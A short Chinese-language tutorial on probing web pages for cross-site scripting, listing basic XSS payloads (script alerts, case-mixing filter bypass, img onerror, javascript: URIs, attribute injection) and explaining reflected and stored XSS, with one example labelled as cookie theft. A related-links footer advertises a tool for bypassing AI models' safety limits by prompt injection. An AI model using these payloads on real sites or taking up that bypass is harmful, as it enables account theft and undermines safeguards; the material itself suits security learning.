探测XSS漏洞方法

一. 登陆页面

二. 在输入框直接输入对应脚本攻击(通用)

  1. 简单弹框:

<script>alert('XSS')</script>

  1. 过滤了大小:

<ScRiPt>AlErt('XSS')</ScRiPt>

  1. 对 img 标签 进行绕过

<img src="#" onerror=alert("XSS")>

  1. 使用 Javascript 的尾协议的脚本

javascript:alert('xss')

  1. 利用 href 属性值来进行xss

' onclick=' alert("xss")

三. 反射型XSS攻击

1)反射型(xss)

反射型(xss):XSS代码常常出现在URL请求中,当用户访问带有XSS代码的URL请求时,服务器端接收请求并处理,然后将带有XSS代码的数据返回给浏览器,浏览器解析该段带有XSS代码的数据并执行,整个过程就像一次反射,故称为反射型XSS.

(1)<script>alert('反射型(xss)')</script> //简单弹框

(2)<ScRiPt>AlErt('反射型(xss)')</ScRiPt> //过滤了大小

(3)<script>alert('document.cookie')</script> //窃取用户 Cookie

四. 存储型XSS攻击

2)存储型(xss)

存储型(xss):攻击的特点是提交的恶意内容会被永久存储,因而一个单独的恶意代码就会使多个用户受害,故被称为持久性XSS.-----一般场景在留言板输入框等

相关推荐
@insist1232 小时前
信息安全工程师-测评核心知识框架与关键流程(上篇)
安全·软考·信息安全工程师·软件水平考试
lifejump3 小时前
Empire(帝国)CMS 7.5 XSS注入
前端·安全·xss
xixixi777773 小时前
AI的“账号”与“钱包”:AWS与Circle同日出手,AI正从工具进化
人工智能·安全·ai·大模型·云计算·aws
JiaWen技术圈3 小时前
Web 安全深入审计检查清单
前端·安全
lifejump5 小时前
Dede(织梦)CMS渗透测试(all)
前端·网络·安全·web安全
星幻元宇VR6 小时前
VR文旅大空间|沉浸式体验重塑文旅新场景
科技·学习·安全·vr·虚拟现实
紫金桥软件6 小时前
组态软件新势力,安全可靠高性能经多行业认证紫金桥软件RealSCADA
安全·scada·组态软件·国产工业软件·监控组态软件
HKT_China6 小时前
物联网安全管理方案 助力企业实施智慧安全管理
物联网·安全·数字化转型
HackTwoHub6 小时前
AI提示词注入绕过工具:一键绕过Codex/Claude安全限制,CTF夺旗与渗透测试必备神器
网络·人工智能·安全·web安全·系统安全·网络攻击模型·安全架构
诺未科技_NovaTech6 小时前
Microsoft 365 E7 ,“AI+安全+身份”三位一体,打造 AI 时代的一站式操作系统
人工智能·安全·microsoft